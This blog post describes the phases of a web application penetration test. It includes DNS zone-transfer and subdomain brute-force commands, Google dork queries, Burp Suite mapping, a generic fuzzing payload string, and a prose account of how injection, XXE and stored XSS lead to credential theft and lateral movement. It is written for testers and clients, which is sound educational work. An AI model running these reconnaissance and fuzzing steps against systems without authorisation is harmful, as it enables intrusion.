This is one part of a two part series, maybe take a look at Hacking a Corporation From the Inside: Internal Penetration Tests too!
Occasionally I get asked by clients how I approach the technical aspects of a Penetration Test, you know, what are all those little black boxes with green text that I’ve got open on my screen? Also occasionally, when I’m talking to new testers and people interested in becoming a penetration tester, they understand tool use and they often understand the specifics of vulnerabilities but don’t necessarily know how it all goes together.
Additionally, GracefulSecurity.com is filled with information on Web Application security, but there’s no guide about how it all fits together! So I plan here, to write up a step-by-step example of how I go from a web address to real business impact.
Every application is different, but my intention as ‘an attacker’ is generally the same and so this won’t be a complete guide to compromising systems, but hopefully will fill in some of the blanks for you if you’ve ever had a tester poke around at your kit, are considering getting a tester to assess your security or if you’ve just cracked the spine on your first web hacking book and want to know a little more about the full process.
When it comes to the attack, the actual act of plugging in and attacking a network, a methodology is followed – ask your penetration tester and they’ll be able to supply you with a written copy of their methodology – but remember, every network is different and every attack is different. A standard way for a tester to operate is to find the path of least resistance and use that to gain as high a privilege level as possible, then utilise this privilege level to find additional methods of entry.
A penetration test is not like vulnerability analysis. Generally with vulnerability analysis you will supply the assessor with a high level of information and privileges from the outset and they’ll perform authenticated scans of the network in order to determine all issues, or as many as possible. Vulnerability assessments generally grade issues independently and do not take in to account the real world exploit-ability of an issues or how issues can be chained together to increase their overall impact. It could be argued that a vulnerability assessment gives a wide, but not deep, impression of the security of the network and will highlight issues with systems such as patch management.
Whereas Penetration Tests aim to get a deep as possible and may sacrifice breadth to enable this, but will give a better idea of what a human attacker could pull off. These assessments will very likely involve actual exploitation of issues, the intentional compromising of systems, chaining of vulnerabilities, and will highlight the worst case scenario for a determined attacker aiming to gain a high level of access.
The tester will move through stages such as:
- Enumeration and Mapping
- Vulnerability Discovery
- Lateral Movement
- Privilege Escalation
- Clean-up/Removal of Evidence
The tester may be lucky and move through these stages directly, potentially even utilising short cuts to skip some stages on the way to a complete compromise or they may be unlucky and have to effectively step back to try and bypass a protection mechanism.
Enumeration and Mapping
Generally at the start of a Penetration Testing engagement you’ll be given a scope which includes IP addresses and application URLs. Some of those URLs may be along the lines of *.example.org. Obviously the client here is stating that all sub-domains of that domain should be assessed. The problem is that generally a well configured system shouldn’t just output a list of all sub-domains available – so you may have to bruteforce them.
If the system is poorly configured, you could grab a list of domains from the authoritative name server, you can find the authoritative with the following command:
> nslookup > set querytype=soa > example.org
Then taking the authoritative name server use the following command:
dig axfr @dns-server example.org
Where dns-server is the authoritative server from the nslookup command. This will cause a DNS Zone Transfer and effectively output a list of available sub-domains.
An alternative way to get this information is through Google Hacking, using Google “dorks”. These are specific keywords given to the search engine to restrict the search, for example you could give it the following input:
with a search like this:
This will cause Google to restrict its search to the target domain, where it may return suggestions such as ftp.example.org, www.example.org and more. To save us searching through multiple pages of search results, we can take a note of the discovered subdomains and then use negative searching to take the out of the results, like this:
site:example.org -site:ftp.example.org -site:www.example.org
Just repeat until you’ve found all the domains the search engine knows about!
The final way bruteforce subdomains is with a list of common subdomain names. No need for fancy tools here, just create a list of potential subdomains called subdomains.txt and run a bash one liner like this:
cat subdomains.txt | while read line; do nslookup $line".example.org";done | grep "Name:"
If you get any hits, it’ll show like this:
Now you’re armed with a list of in-scope applications it’s time to start mapping the applications themselves. For almost all the steps of a Web Application assessment I use Burp Suite, there’s a free version or alternatively you could use OWASP ZAP. Now if you’re new to Burp I’ve done a full write up of the Professional version showing Burp Suite usage here.
To map the application Burp has two options, “spider” and “discover content”. Spider is a pretty simply tool which you can select from the Target > Site Map menu. As shown here:
Spider simply navigates around a domain and clicks all of the links, effectively mapping all linked content. However it obviously won’t find any unlinked content. Such as hidden administrative interfaces, log files and backup content. However the “Forced Browser” option Discover Content can be used for that!
This option uses a build in list of possible files and directories and attempts to access them, then reports whether that was possible or not! You can start the browser with the session button, here:
Once that’s finished (which will likely take a long time!) you should have a map of all the content on the application. Meaning that you’ll have a list in the dashboard of all of the functions the application offers, no it’s just a case of testing each function for vulnerabilities! A list of unique requests can be found in the Burp Dashboard, like this:
If we’ve mapped the whole application this “Contents” list will show all functions, so we test each in turn.
Now when it comes to vulnerability discovery we’re going to assess each function in turn, likely using either the Intruder or Repeater function of Burp suite (these are described here). There’s two main ways to assess each function, the first is simply through fuzzing – to break the logic of the function to see if anything interesting happens. Where “interesting” could be verbose error messages, information disclosure, function bypassing. Alternatively you can approach the function from the point of a vulnerability and trying payloads specifically for that issue. Such as HTTP Header Injection, SQL Injection, Command Injection, Cross-site Scripting, Cross-site Request Forgery, XML eXternal Entity Injection, or Insecure Direct Object Reference.
From a generic fuzzing point of view it’s a good idea to place payloads such as the following in to every input to see how they react:
1 10 100 1000000000000000000000000 -1 0.1 lizard ' " ; ) )))))))))))))))))))) ] ]]]]]]]]]]]]]]]]]]]] TRUE FALSE \0 %00 |
Potentially the application will respond with output that in the context may lead to a vulnerability, such as a verbose error message. Alternatively you can send payloads specifically to designed to exploit issues such as those listen in the OWASP Top 10. For a decent list of potential payloads I’ve compiled some Cheat Sheets here, or alternatively a hugh payload list is available as part of fuzzdb!
Exploitation, Lateral Movement and Privilege Escalation
There are a few that exploitation can lead to lateral movement or privilege escalation. The first is if a vulnerability exists which allows command execution – such as SQL Injection or Command Injection. In this case the assessor will likely be able to target additional systems within the DMZ or internal corporate network. In fact, at the point of being able to run commands the assessment ceases to be a web application assessment and is leaning more towards an Internal Network Assessment.
Additionally there’s the potential that a vulnerability such as XML External Entity Injection, Path Traversal or Arbitrary File Download can lead to credentials being stolen by an attacker and lateral movement can be to other systems through credential reuse.
Finally if an attacker is able to cause stored Cross-site Scripting there may be the potential that the payload executes on an entirely different application. For example if a user creates a user account through standard user registration on www.example.org a stored cross-site scripting payload in a parameter such as home address could find its way in to admin.example.org, allowing the attacker to attack that application too, potentially by stealing session tokens or through on-site request forgery.
Clean-up/Removal of Evidence
Now if this was a malicious attacker performing these steps there’s much more work to be done. Log carving and generally removing all traces of activity as you’d expect. However as a penetration tester there’s still work to be done too. Depending on the path of exploitation there may be files and user accounts that should be cleaned up. For example if it was possible to upload a web shell due to insecure file handling then that should be removed at the end of the engagement so the system is returned to as close as it was before the engagement began.
Now it’s time to write that assessment report…